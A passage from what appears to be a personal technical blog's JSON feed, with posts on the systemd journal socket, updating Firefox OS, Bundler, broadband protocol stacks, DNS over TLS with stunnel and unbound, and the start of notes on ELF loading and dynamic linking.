We can create a message with:

\n
echo \"PRIORITY=7\nMESSAGE=Debug 1\nSYSLOG_IDENTIFIER=foo\nFOO=bar\n\" | socat STDIN UNIX-SENDTO:/run/systemd/journal/socket\n
\n\n\n

It is used by the C\nAPI:\nsd_journal_print, sd_journal_send, etc.

\n

Output

\n

Journal files

\n

If the /var/log/journal directory exists and has the proper\npermissions, journald will use it to store the logging information in\na binary\nformat.

\n

Syslog output

\n

/run/systemd/journal/syslog is a SOCK_DGRAM socket used to send\nthe messages to a syslog daemon (rsyslog).

"}, {"id": "http://www.gabriel.urdhr.fr/2015/03/29/update-firefox-os/", "title": "Updating Firefox OS", "url": "https://www.gabriel.urdhr.fr/2015/03/29/update-firefox-os/", "date_published": "2015-03-29T00:00:00+01:00", "date_modified": "2015-03-29T00:00:00+01:00", "tags": ["computer", "mozilla", "firefox-os"], "content_html": "

I updated a Geeksphone Peak from\nFirefox OS 1.1 to Firefox OS\n2.1 and it was not that easy.

\n

The process is\nexplained\non the Mozilla developper website:

\n
    \n
  1. \n

    first backup everything (AFAIK, this is mostly useful if you want\n to restore your original OS);

    \n
  2. \n
  3. \n

    flash the device with the suitable\n image.

    \n
  4. \n
\n

Issue

\n

What was not so clear (and I found this out after flashing the device)\nis that if you try to restore your /data partition in order to get\nyour data data, it won't work very well \"\ud83d\ude1e\".\nYou obtain a weird/broken mix between the original version of the OS\nand the new one:

\n\n

I get the same kind of behaviour when updating to either v1.4, v2.1,\nv2.2 beta.

\n

If your restore the original version of the OS, you get your data back\n(so the backup is not completely useless).

\n

Partial solution

\n

At this point is seems that restoring the /data partition on the new\nversion of the OS is quite pointless. So this is what I did:

\n\n

Update 2015-04-28: with the updated OS, the phone was having a\nlot of graphic glitches (for example, some parts of the windows would\nnot render at all) and crashes. I managed to fix this by unchecking\nmost of the options in the Developer menu. I don't know\nwhich options were responsible for the bugs. Currently, the only\nenabled options are:

\n\n

Conclusion

\n

I'm not sure if doing all of this was necessary because v1.1 was a very old\nversion or if this will be necessary for a future update.

\n

Now the geolocation works. \"\ud83d\ude04\"

\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/03/02/bundler-starter-kit/", "title": "Bundler Starter Kit", "url": "https://www.gabriel.urdhr.fr/2015/03/02/bundler-starter-kit/", "date_published": "2015-03-02T00:00:00+01:00", "date_modified": "2015-03-02T00:00:00+01:00", "tags": ["computer", "ruby"], "content_html": "

Bundler is a tool to manage Ruby gem\ndependencies, install them and setup the execution environment. The\nhomepage shows how to use it to install the gems alongside the ruby\ninstallation/systemwide which is not so great. For some reason, I\ninitially didn't find the option to install the gems locally\n(--path) and have been using horrible environment variable\nmodifications to avoid the systemwide installation. In fact, this is\nquite simple\u2026

\n

Bundler

\n
which bundle || sudo apt-get install bundler\nmkdir foo/\ncd foo/\n\ncat <<EOF > Gemfile\nsource 'https://rubygems.org'\ngem \"kramdown\"\nEOF\n\nbundle install --path vendor/bundle --binstubs\necho '#Hello' | ./bin/kramdown\necho '#Hello' | middleman exec kramdown\n
\n\n\n

Explanations:

\n\n

git

\n
git init .\n\ncat <<EOF >> .gitignore\nbin\nvendor\n.bundle\nEOF\n\ngit add Gemfile Gemfile.lock .gitignore \ngit commit -m\"First commit\"\n
\n\n\n

Issues

\n

Provide path for dependencies for native extensions:

\n
bundle config build.nokogiri\\\n  \"--use-system-libraries --with-xml2-include=/usr/local\"\n
\n\n\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/02/15/broadband-protocol-stack/", "title": "The broadband protocol stacks", "url": "https://www.gabriel.urdhr.fr/2015/02/15/broadband-protocol-stack/", "date_published": "2015-02-15T00:00:00+01:00", "date_modified": "2015-02-15T00:00:00+01:00", "tags": ["computer", "network", "broadband", "dsl"], "content_html": "

The Broadband Forum as a lot of technical\nreports about\nthe xDSL architecture but it's not so easy to find a good description\nof the global architecture. Those are ASCII-art protocol stack I\ninferred from those documents. What's in there may be wrong, feel free\nto correct me.

\n

You can find relevant diagrams in\nTR-025\n(figure 4,\nfor end-to-end ATM network;\nfigure 5\nfor L2TP;\nfigure 6\nfor PPP termination at the access node),\nin TR-101\n(figure 4\nfot the U interface;\nfigure 7\nfor the V interface),\nTR0-59\n(figure 11).

\n

Classic POTS access with PPP

\n
\n
\n[IP  ]<------------------------------->[IP ]\n[PPP ]<------------------------------->[PPP]\n[    ]<->[  |V.90]<------>[V.90|   ]<->[   ]\nClient     Modem            Modem       RAS\n
\n
\n\n

The link between the client and the RAS is a point-to-point link. The\nPPP\nlink-layer protocol is used. It provides:

\n\n

Basic example: PPPoA

\n
\n
\n                 PPPoE                    PPPoA                  L2TP\n             <-------------> <------------------------------> <---------->\n\n[IP ]<->[IP       ]<------------------------------------------------->[IP  ]\n            [PPP  ]<---------------------------------(PPP         )-->[PPP ]\n            [PPPoE]<->[PPPoE|PPPoA  ]<-------------->[PPPoA  |L2TP]<->[L2TP]\n                            [RFC2684]<-------------->[RFC2684|UDP ]<->[UDP ]\n                            [AAL5   ]<-------------->[AAL5   |IP  ]<->[IP  ]\n[Eth]<->[Eth|Eth  ]<->[Eth  |ATM    ]<->[ATM     ]<->[ATM    |    ] \u2026 [    ]\n[PHY]<->[PHY|PHY  ]<->[PHY  |xDSL   ]<->[xDSL|PHY]<->[PHY    |    ] \u2026 [    ]\n      S             T                 U            V               A10\n         Router       B-NT/xDSL modem   AN/DSLAM       LAC/BRAS     \u2026   LNS\n
\nPPPoE to PPPoA to L2TP\n
\n\n

Explanations:

\n\n

On new deployments, it is recommended to use\n Ethernet instead of ATM for the\n aggregation.

\n\n

Variations

\n\n

Modem-router

\n

The modem and the router are often merged in a modem-router:

\n
\n
\n                        PPPoA                   L2TP\n            <-------------------------------><---------->\n\n[IP ]<->[IP         ]<------------------------------->[IP  ]\n            [PPP    ]<---------------(PPP         )-->[PPP ]\n            [PPPoA  ]<-------------->[PPPoA  |L2TP]<->[L2TP]\n            [RFC2684]<-------------->[RFC2684|UDP ]<->[UDP ]\n            [AAL5   ]<-------------->[AAL5   |IP  ]<->[IP  ]\n[Eth]<->[Eth|ATM    ]<->[ATM     ]<->[ATM    |    ] \u2026 [    ]\n[PHY]<->[PHY|xDSL   ]<->[xDSL|PHY]<->[PHY    |    ] \u2026 [    ]\n      T               U            V               A10\n        Modem-Router    AN/DSLAM       LAC/BRAS    \u2026   LNS\n
\nModem-router\n
\n\n

PPPoEoA

\n

Instead of converting between PPPoE to PPPoA, the modem can\nencapsulate PPPoE over ATM (PPPoEoA). The modem can be seen as an\nEthernet bridge. This solution is often called PPPoE because ATM was\npreviously always used for aggregation.

\n
\n
\n                               PPPoE                             L2TP\n             <----------------------------------------------> <---------->\n\n[IP ]<->[IP       ]<------------------------------------------------->[IP  ]\n            [PPP  ]<---------------------------------(PPP         )-->[PPP ]\n            [PPPoE]<-------------------------------->[PPPoE  |L2TP]<->[L2TP]\n[Eth]<->[Eth|Eth  ]<->[Eth          ]<-------------->[Eth    |UDP ] \u2026 [UDP ]\n                      [     |AAL5   ]<-------------->[AAL5   |IP  ] \u2026 [IP  ]\n                      [     |ATM    ]<->[ATM     ]<->[ATM    |    ] \u2026 |    ]\n[PHY]<->[PHY|PHY  ]<->[PHY  |xDSL   ]<->[xDSL|PHY]<->[PHY    |    ] \u2026 [    ]\n      S             T                 U            V               A10\n         Router       B-NT/xDSL modem   AN/DSLAM       LAC/BRAS    \u2026  LNS\n
\nPPPoE to PPPoEoA to L2TP\n
\n\n

Ethernet aggregation

\n

In this example, the aggregation network is Ethernet based. This is\nrecommended for new deployments. PPPoE (without ATM) is used instead\nof PPPoA. As before, the modem can be seen as an Ethernet switch.

\n
\n
\n                             PPPoE                                L2TP\n             <-----------------------------------------------> <---------->\n\n[IP ]<->[IP       ]<-------------------------------------------------->[IP  ]\n            [PPP  ]<----------------------------------(PPP         )-->[PPP ]\n            [PPPoE]<--------------------------------->[PPPoE  |L2TP]<->[L2TP]\n                                                      [       |UDP ]<->[UDP ]\n                                             [QinQ]<->[QinQ   |IP  ]<->[IP  ]\n[Eth]<->[Eth|Eth  ]<->[Eth          ]<->[Eth      ]<->[Eth    |    ] \u2026 [    ]\n[PHY]<->[PHY|PHY  ]<->[PHY  |xDSL   ]<->[xDSL|PHY ]<->[PHY    |    ] \u2026 [    ]\n      S             T                 U             V               A10\n         Router       B-NT/xDSL modem   AN/DSLAM        LAC/BRAS    \u2026  LNS\n
\nPPPoE to L2TP\n
\n\n

IPoE

\n

Ethernet aggregation (no ATM) without PPP.

\n
\n
\n[IP ]<->[IP       ]<--------------------------------->[IP        ]<->[IP  ]\n                                             [QinQ]<->[QinQ |    ] \u2026 [    ]\n[Eth]<->[Eth|Eth  ]<->[Eth          ]<->[Eth      ]<->[Eth  |    ] \u2026 [    ]\n[PHY]<->[PHY|PHY  ]<->[PHY  |xDSL   ]<->[xDSL|PHY ]<->[PHY  |    ] \u2026 [    ]\n      S             T                 U             V             A10\n         Router        B-NT              AN             BNG        \u2026  \n                       (xDSL modem)      (DSLAM)\n
\nIPoE\n
\n\n

Interfaces

\n

Details of the interfaces can be found in TR-059 page\n9.

\n\n

The T interface

\n
\n
\n        [ IP    ]\n        [ PPP   ]\n[ IP  ] [ PPPoE ]\n[ Eth ] [ Eth   ]\n[ PHY ] [ PHY   ]\n
\n
\n\n

The U Interface

\n

The U interface is the interface between the B-NT (the xDSL modem) and\nthe Access Node (DSLAM):

\n
\n
\n          [IP     ]\n          [PPP    ]\n[IP     ] [PPPoE  ]           [IP     ]\n[Eth    ] [Eth    ] [IP     ] [PPP    ]         [IP   ]\n[RFC2684] [RFC2684] [RFC2684] [RFC2684]         [PPP  ]\n[AAL5   ] [AAL5   ] [AAL5   ] [AAL5   ] [IP   ] [PPPoE]\n[ATM    ] [ATM    ] [ATM    ] [ATM    ] [Eth  ] [Eth  ] [Eth]\n[PHY    ] [PHY    ] [PHY    ] [PHY    ] [PHY  ] [PHY  ] [PHY]\n\n IPoEoA    PPPoEoA   IPoA      PPPoA     IPoE    PPPoE   Eth\n a         b         c         d         e       f       g\n
\nProtocol stacks fot the U interface\n
\n\n

TR-043\ncompares the different ATM-based solutions.

\n

Notes:

\n\n

The V Interface

\n
\n
\n                              [IP  ]\n[IP     ] [PPP    ]           [PPP ]\n[802.1ad] [802.1ad] [802.1ad] [AAL5]\n[Eth    ] [Eth    ] [Eth    ] [ATM ]\n[PHY    ] [PHY    ] [PHY    ] [PHY ]\n IPoE      PPPoE\n a         b         c\n
\nProtocol stacks fot the V interface\n
\n\n

More stuff

\n

Multiplexing over AAL5

\n

RFC2684 defined two methods of\nprotocol multiplexing over AAL5:

\n\n
\n
\n                 [            ]\n                 [(SNAP|NLPID)]\n[    ]           [LLC         ]\n[AAL5]           [AAL5        ]\n[ATM ]           [ATM         ]\nVC Multiplexing  LLC Encapsulation\n
\nEncapsulation over AAL5\n
\n\n

L2TP and RADIUS message exchange

\n
\n[Client] [BRAS]          [LNS]\n   |       | [RADIUS Proxy]|  [RADIUS]\n   |       |       |       |     |\n   |       |       |       |     |\n   |       |       |       |     |  I] Initial challenge\n   |       |       |       |     |\n   |<------|       |       |     |  CHAP Challenge\n   |------>|       |       |     |  CHAP Success\n   |       |------>|------------>|  RADIUS Access-Request\n   |       |<------|<------------|  RADIUS Access-Accept\n   |       |       |       |     |    Tunnel-Type=L2TP\n   |       |       |       |     |    Tunnel-Medium-Type=IPv4\n   |       |       |       |     |    Tunnel-Server-Endpoint=lns.example.com\n   |       |       |       |     |    Tunnel-Password=potato\n   |<------|       |       |     |  CHAP Success\n   |       |       |       |     |\n   |       |       |       |     |\n   |       |       |       |     |  II] Tunnel establishment\n   |       |       |       |     |\n   |       |-------------->|     |  L2TP Start-Control-Connection-Request\n   |       |<--------------|     |  L2TP Start-Control-Connection-Reply\n   |       |-------------->|     |  L2TP Start-Control-Connection-Connected\n   |       |<--------------|     |  L2TP Zero-Length Body Ack.\n   |       |       |       |     |\n   |       |       |       |     |  III] Call establishment\n   |       |       |       |     |\n   |       |-------------->|     |  L2TP Incoming-Call-Request\n   |       |<--------------|     |  L2TP Incoming-Call-Reply\n   |       |-------------->|     |  L2TP Incoming-Call-Connected\n   |       |<--------------|     |  L2TP Zero-Length Body Ack.\n   |       |       |       |     |\n   |       |       |       |     |\n   |       |       |       |     |  IV] New challenge\n   |       |       |       |     |\n   |<----------------------|     |  CHAP Challenge\n   |---------------------->|     |  CHAP Response\n   |       |       |       |---->|  RADIUS Access-Request\n   |       |       |       |<----|  RADIUS Access-Accept\n   |<----------------------|     |  CHAP Success\n   |       |       |       |     |\n
\n\n

References

\n\n

Recommendation of PPP over ATM at the U interface for ATM end-to-end network.

\n\n

Describes PPPoEoA, IPoEoA, IPoA. A this time ATM was always used so\n PPPoEoA was named PPPoE and IPoEoA was named IPoE.

\n\n

Suggests at least /60 IPv6 delegated prefix for home network and\n recommends /56. Suggests up to /48 for large organisations.

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/02/14/recursive-dns-over-tls-over-tcp-443/", "title": "Recursive DNS over TLS over TCP 443", "url": "https://www.gabriel.urdhr.fr/2015/02/14/recursive-dns-over-tls-over-tcp-443/", "date_published": "2015-02-14T00:00:00+01:00", "date_modified": "2017-05-15T00:00:00+02:00", "tags": ["computer", "network", "dns", "internet", "tls"], "content_html": "

You might want to use an open recursive DNS servers if your ISP's DNS\nserver is lying. However, if your network/ISP is intercepting all DNS\nrequests, a standard open recursive DNS server won't help. You might\nhave more luck by using an alternative port or by forcing the usage of\nTCP (use-vc option in recent versions of glibc) but it might not\nwork. Alternatively, you could want to talk to a (trusted) remote\nrecursive DNS server over secure channel such as TLS: by using DNS\nover TLS over TCP port 443 (the HTTP/TLS port), you should be able to\navoid most filtering between you and the recursive server.

\n

Update (2016-05-18):\nRFC7858, Specification for DNS over TLS\ndescribes the use TLS over DNS (using TCP port 853).

\n

Update (2017-04-08):\nAll those solutions use\none TCP (and TLS) connection per DNS request\nwhich is quite inefficient.

\n

Update (2017-05-17):\nThis was written before DNS/TLS was a thing\n(and before it was natively implemented in resolvers).\nSee DNS Privacy\nfor up-to-date instructions.

\n

Warning! You might not want to use DNS/TLS to bypass state\ncensorship (you probably want some sort of\nstealthy VPN):

\n\n

Summary

\n

On the server-side:

\n\n

On the client-side:

\n\n

Generic solution:

\n
\n          cache      verify TLS\n\n[DNS ]<->[DNS     ]<->------------------------------->[DNS]\n[    ]   [        ]<->[   |TLS]----------->[TLS|  ]   [   ]\n[UDP*]<->[UDP*|TCP]<->[TCP    ]<---------->[TCP   ]<->[TCP]\n[IP  ]<->[IP      ]<->[IP     ]<---------->[IP    ]<->[IP ]\nStub R.   Forwarder   TLS Init. Internet   TLS Term.  Recursive\n         (unbound)    (stunnel)            (stunnel)\n\n*: or TCP if the reply is too long\n
\n\n

Unbound can be use directly for TLS on the server side:

\n
\n          cache      verify TLS\n\n[DNS ]<->[DNS     ]<->-------------------->[DNS]\n[    ]   [        ]<->[   |TLS]----------->[TLS]\n[UDP*]<->[UDP*|TCP]<->[TCP    ]<---------->[TCP]\n[IP  ]<->[IP      ]<->[IP     ]<---------->[IP ]\nStub R.   Forwarder   TLS Init.  Internet  Recursive\n          (unbound)   (stunnel)            (unbound)\n
\n\n

However, it is currently not safe to use unbound to DNS/TLS on the\nclient-side because unbound does not verify the remote\ncertificate1\n(MITM attack). This solution is not safe:

\n
\n          cache       MITM!\n\n[DNS ]<->[DNS     ]<--------->[DNS]\n[    ]   [    |TLS]<--------->[TLS]\n[UDP*]<->[UDP*|TCP]<--------->[TCP]\n[IP  ]<->[IP      ]<--------->[IP ]\nStub R.  Forwarder  Internet Recursive\n         (unbound)           (unbound)\n
\n\n

Software used

\n

stunnel

\n

stunnel can be used to add/remove TLS\nlayers:

\n\n

Protocol stack:

\n
\n       verify TLS\n\n[DNS]<-------------------------------->[DNS]\n[   ]   [  |TLS]<---------->[TLS|  ]   [   ]\n[TCP]<->[TCP   ]<---------->[TCP   ]<->[TCP]\n[IP ]<->[IP    ]<---------->[IP    ]<->[IP ]\nStub R. TLS Init. Internet  TLS Term.  Recursive\n        (stunnel)           (stunnel)\n
\n\n

The issue is that usually the resolver will first try to make the\nquery over UDP. If their is not UDP reply, the resolver will not\nswitch to TCP. We need a way to force the resolver to use TCP.

\n

libc

\n

The GNU libc resolver has an (undocumented) option, use-vc (see\nresolv/res_init.c) to force the usage of TCP for DNS resolutions.\nThis option is available since glibc v2.14 (available since Debian\nJessie, since Ubuntu 12.04).

\n

In /etc/resolv.conf:

\n
options use-vc\nnameserver 2001:913::8\n
\n\n\n

With the RES_OPTIONS environment variable:

\n
RES_OPTIONS=\"use-vc\"\nexport RES_OPTIONS\n
\n\n\n

Example:

\n
$ #Using UDP (SOCK_DGRAM):\n$ strace getent hosts www.ldn-fai.net 2>&1 | grep -e PF_INET\nsocket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 3\nsocket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4\nsocket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 3\n\n$ #Using TDP (SOCK_STREAM):\n$ RES_OPTIONS=use-vc strace getent hosts www.ldn-fai.net 2>&1 | \\\n  grep -e PF_INET\nsocket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3\n
\n\n\n

Other libc implementations:

\n\n

Similar libraries:

\n\n

Truncate all answers

\n

The option to force the usage of TCP for DNS resolution is not\navailable everywhere (many stub resolvers do not handle this option and\nsome sofware do not use the system resolver). A hack to force the\nstub resolver to use TCP would be to have a simple local DNS/UDP service\nwhich always replies with the truncated bit set (TC=1): this should\nforce most implementations to switch to TCP (and talk to the local\nstunnel process):

\n
\n[Resolver] [Fake service] [local stunnel] // [Remote recursive]\n    |          |             |                 |\n    |--------->|             |                 |  Query over UDP\n    |<---------|             |                 |  Response over UDP (TC=1)\n    |----------------------->|---------------->|  Query over TCP\n    |<-----------------------|<----------------|  Response over TCP\n
\n\n

TruncateDNSd is a\nproof-of-concept implementation of this idea: I'm not sure there is a\nclean way to do this so it might remain a proof-of-concept.

\n

Unbound

\n

The correct solution is to have a local DNS recursive server which is\nable to delegate to a remote recursive DNS over TCP:\nUnbound can talk (either as a server or as a\nclient) over TCP (tcp-upstream) or over TLS/TCP (ssl-upstream,\nssl-service-key, ssl-service-pem, ssl-port).

\n

However, it seems it cannot validate the certificate (v1.5.1):

\n\n

Those two limitations can be mitigated by using a dedicated TLS\nencapsulation daemon such as stunnel or socat.

\n

Server-side configuration

\n

Using stunnel

\n

stunnel configuration:

\n
; /etc/stunnel/dns.conf\nsetuid=stunnel4\nsetgid=stunnel4\npid=/var/run/stunnel4/dns.pid\noutput=/var/log/stunnel4/dns.log\nsocket = l:TCP_NODELAY=1\nsocket = r:TCP_NODELAY=1\n\n[dns]\ncert=/etc/stunnel/dns.pem\naccept=443\nconnect=53\n
\n\n\n

Keypair and certificate generation:

\n
openssl req -days 360 -nodes -new -x509 -keyout key.pem -out cert.pem \\\n  -subj \"/CN=$MY_IP\" -sha256 -newkey rsa:2048\n(cat key.pem ; echo ; cat cert.pem ; echo ) > dns.pem\nsudo chmod root:root dns.pem\nsudo chmod 440 dns.pem\nsudo mv dns.pem /etc/stunnel/\n
\n\n\n

Protocol stack:

\n
\n[DNS]<----------------------->[DNS]\n[TLS]<------------>[TLS|  ]   [   ]\n[TCP]<------------>[TCP   ]<->[TCP]\n[IP ]<------------>[IP    ]<->[IP ]\nResolver Internet  TLS Term.  Recursive\n                   (stunnel)\n
\n\n

Using unbound

\n

Unbound can be configured to use TLS directly with ssl-port,\nssl-service-key, ssl-service-pem.

\n

Client-side configuration

\n

Using socat

\n
sudo socat \\\n  TCP4-LISTEN:53,bind=127.0.0.1,fork,nodelay,su=nobody \\\n  OPENSSL:80.67.188.188:443,verify=1,cafile=dns.pem,nodelay\n
\n\n\n

With /etc/resolv.conf:

\n
options use-vc\nnameserver 127.0.0.1\n
\n\n\n

Protocol stack:

\n
\n      verify TLS\n\n[DNS]<--------------------[DNS]\n[   ]   [  |TLS]<-------->[TLS]\n[TCP]<->[TCP   ]<-------->[TCP]\n[IP ]<->[IP    ]<-------->[IP ]\nStub R.  socat   Internet  Recursive\n
\n\n

Programs and libraries trying to parse resolv.conf directly without\nusing the res_ (for example lwresd) functions will usually ignore\nthe use-vc and fail to work if no DNS server replies on UDP.

\n

Using stunnel

\n

This is the client side stunnel configuration:

\n
setuid=stunnel4\nsetgid=stunnel4\npid=/var/run/stunnel4/dns.pid\noutput=/var/log/stunnel4/dns.log\nclient=yes\nsocket = l:TCP_NODELAY=1\nsocket = r:TCP_NODELAY=1\n\n[dns]\nCAfile=/etc/stunnel/dns.pem\naccept=127.0.0.1:53\nconnect=80.67.188.188:443\nverify=4\n
\n\n\n

with the same resolv.conf.

\n

Protocol stack:

\n
\n       verify TLS\n\n[DNS]<--------------------->[DNS]\n[   ]   [  |TLS]<---------->[TLS]\n[TCP]<->[TCP   ]<---------->[TCP]\n[IP ]<->[IP    ]<---------->[IP ]\nStub R. TLS Init. Internet  Recursive\n        (stunnel)\n
\n\n

Using unbound

\n

Warning: This configuration is vulnerable to\nMITM attacks1.\nUse the unbound + stunnel configuration instead.

\n

A better solution would be to install a local unbound. The local\nunbound instance will cache the results and avoid a higher latency due\nto TCP and TLS initialisation:

\n
server:\n  # verbosity: 7\n  ssl-upstream: yes\nforward-zone:\n  name: \".\"\n  forward-addr: 80.67.188.188@443\n
\n\n\n
# /etc/resolv.conf\nnameserver 127.0.0.1\n
\n\n\n

Protocol stack:

\n
\n     DNSSEC valid.\n         cache\n\n[DNS]<->[DNS   ]<---------->[DNS]\n[   ]   [  |TLS]<---------->[TLS]\n[TCP]<->[TCP   ]<---------->[TCP]\n[IP ]<->[IP    ]<---------->[IP ]\nStub R. Forwarder Internet  Recursive\n        (unbound)\n
\n\n

As a bonus, you can enable local DNSSEC validation.

\n

Using unbound and stunnel

\n

Unbound currently does not verify the validity of the remote X.509\ncertificate. In order to avoid MITM attacks, you might want to add a\nlocal stunnel between unbound and the remote DNS server.

\n

The unbound configuration uses plain TCP:

\n
server:\n  # verbosity:7\n  tcp-upstream: yes\n  do-not-query-localhost: no\nforward-zone:\n  name: \".\"\n  forward-addr: 127.0.0.1@1234\n
\n\n\n

Issues:

\n\n

On Debian Jessie, this in handled by\n /etc/resolvconf/update.d/unbound and can be disabled by setting\n RESOLVCONF_FORWARDERS=false in /etc/default/unbound.

\n

A local stunnel instance handles the TLS encapsulation (with remote\ncertificate verification):

\n
setuid=stunnel4\nsetgid=stunnel4\npid=/var/run/stunnel4/dns.pid\noutput=/var/log/stunnel4/dns.log\nsocket = l:TCP_NODELAY=1\nsocket = r:TCP_NODELAY=1\n\n[dns]\nclient=yes\nCAfile=/etc/stunnel/dns.pem\naccept=127.0.0.1:1234\nconnect=80.67.188.188:443\nverify=4\n
\n\n\n

Protocol stack:

\n
\n     DNSSEC valid.\n         cache       verify TLS\n\n[DNS]<->[DNS   ]<------------------------>[DNS]\n[   ]   [      ]<---->[  |TLS]<---------->[TLS]\n[TCP]<->[TCP   ]<---->[TCP   ]<---------->[TCP]\n[IP ]<->[IP    ]<---->[IP    ]<---------->[IP ]\nClient   Forwarder    TLS Init. Internet   Recursive\n         (unbound)    (stunnel)\n
\n\n

Verifying that the setup is correct

\n
# We whould see the local traffic to your unbound instance:\nsudo tcpdump -i lo \"port 53\"\n\n# We should see the traffix from unbound to local stunnel instance:\nsudo tcpdump -i lo \"port 1234\"\n\n# We should not see outgoing DNS traffic:\nsudo tcpdump -i eth0 \"port 53\"\n\n# Make DNS requests and see if everything works as expected:\ndig attempt45.example.com\n\n# Flush the cache:\nsudo unbound-control flush_zone .\n\n# Make DNS requests directly on the tunnel (bypass unbound):\ndif +tcp @127.0.0.1 -p 1234 attempt46.example.com\n\n# Display the list of forward servers:\nsudo unbound-control list_forwards\n
\n\n\n

What about DNSSEC?

\n

If your local resolver verify the authenticity of the DNS reply with\nDNSSEC, it will be able to detect a spoofed DNS reply and reject\nit. But it will still not be able to get the correct reply. So you\nshould use DNSSEC but you might still want to use DNS/TLS.

\n

TLS configuration

\n

See the Mozilla SSL Configuration\nGenerator:

\n

stunnel

\n
[dns]\n# Append this to the service [dns] section:\noptions = NO_SSLv2\noptions = NO_SSLv3\noptions = NO_TLSv1\noptions = CIPHER_SERVER_PREFERENCE\nciphers = ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!3DES:!MD5:!PSK\n
\n\n\n

References

\n

TLS for DNS:

\n\n

An IETF working group working on privacy issues of DNS exchanges with drafts:

\n\n

This setup directly connects the UDP socket with the TCP socket with\n socat as a consequence, the TLS stream does not transport the DNS\n requests in the TCP\n wire-format. I\n guess there should be framing problems when converting from TCP to\n UDP.

\n\n

Open recursive DNS server:

\n\n

DNS censorship:

\n\n

DNS monitoring:

\n\n
\n
\n
    \n
  1. \n

    In the unbound code, the TLS outgoing connections are setup in\nvoid* connect_sslctx_create(char* key, char* pem, char* verifypem).\nThis function only calls SSL_CTX_set_verify()\nif the verifypem parameter is not NULL.\nHowever, connect_sslctx_create() is always\ncalled with verifypem set to NULL.

    \n

    You can verify this by configuring a local DNS/TLS service:

    \n

    \nopenssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 256 -nodes\nsocat -v OPENSSL-LISTEN:1234,fork,certificate=./cert.pem,key=./key.pem TCP:80.67.188.188:53\n
    \n

    and configure unbound to use it as a TLS upstream:

    \n

    \nserver:\n  # verbosity:7\n  ssl-upstream: yes\n  do-not-query-localhost: no\nforward-zone:\n  name: \".\"\n  forward-addr: 127.0.0.1@1234\n
    \u00a0\u21a9\u21a9\n
  2. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/01/22/elf-linking/", "title": "ELF loading and dynamic linking", "url": "https://www.gabriel.urdhr.fr/2015/01/22/elf-linking/", "date_published": "2015-01-22T00:00:00+01:00", "date_modified": "2015-01-22T00:00:00+01:00", "tags": ["computer", "system", "elf", "linker", "linux", "multiarch"], "content_html": "

Some notes on ELF loading and dynamic linking mainly for GNU userland\n(ld.so, libc, libdl) running on top of the Linux kernel. Some\nprior knowlegde on the topic (virtual memory, shared objects,\nsections) might be useful to understand this.

\n

ELF introduction

\n

The ELF format is a standard file format used for different types of\nobjects:

\n\n

Static libraries (.a files, archive packages) are not ELF files but\narchives of .o files.

\n

More information about the ELF format can be found in\nman elf,\nelf.h,\nthe System V specification,\nthe LSB\n(for Linux-specific stuff).\nThe readelf tool can be used to visualise the fields of ELF files and is\nvery useful to understand what information is in the ELF files, correlate\nthem with /proc/${pid}/maps and understand how the loading and linking of\nprograms work on ELF-based systems.

\n

ELF header

\n

The ELF header is defined as:

\n
typedef struct\n{\n  unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */\n  ElfXX_Half    e_type;             /* Object file type */\n  ElfXX_Half    e_machine;          /* Architecture */\n  ElfXX_Word    e_version;          /* Object file version */\n  ElfXX_Addr    e_entry;            /* Entry point virtual address */\n  ElfXX_Off     e_phoff;            /* Program header table file offset */\n  ElfXX_Off     e_shoff;            /* Section header table file offset */\n  ElfXX_Word    e_flags;            /* Processor-specific flags */\n  ElfXX_Half    e_ehsize;           /* ELF header size in bytes */\n  ElfXX_Half    e_phentsize;        /* Program header table entry size */\n  ElfXX_Half    e_phnum;            /* Program header table entry count */\n  ElfXX_Half    e_shentsize;        /* Section header table entry size */\n  ElfXX_Half    e_shnum;            /* Section header table entry count */\n  ElfXX_Half    e_shstrndx;         /* Section header string table index */\n} ElfXX_Ehdr;\n
\n\n\n

where XX is either 32 (for ELF-32) or 64 (for ELF-64).

\n

The ElfW(type) macro can be used to refer to the native ELF types:

\n
#define ElfW(type)  _ElfW (Elf, __ELF_NATIVE_CLASS, type)\n#define _ElfW(e,w,t)    _ElfW_1 (e, w, _##t)\n#define _ElfW_1(e,w,t)  e##w##t\n
\n\n\n

Which is used as:

\n
ElfW(Ehdr)* native_header;\nElfW(Off)   native_offset;\nElfW(Addr)  native_address;\n
\n\n\n

The ELF header can be read with readelf -h:

\n
$ readelf -h /bin/sh\nELF Header:\n  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00\n  Class:                             ELF64\n  Data:                              2's complement, little endian\n  Version:                           1 (current)\n  OS/ABI:                            UNIX - System V\n  ABI Version:                       0\n  Type:                              DYN (Shared object file)\n  Machine:                           Advanced Micro Devices X86-64\n  Version:                           0x1\n  Entry point address:               0x404c\n  Start of program headers:          64 (bytes into file)\n  Start of section headers:          123672 (bytes into file)\n  Flags:                             0x0\n  Size of this header:               64 (bytes)\n  Size of program headers:           56 (bytes)\n  Number of program headers:         9\n  Size of section headers:           64 (bytes)\n  Number of section headers:         27\n  Section header string table index: 26\n
\n\n\n

The e_ident fields contains:

\n\n

Static binary

\n

Let's start with the loading of statically linked binaries:

\n
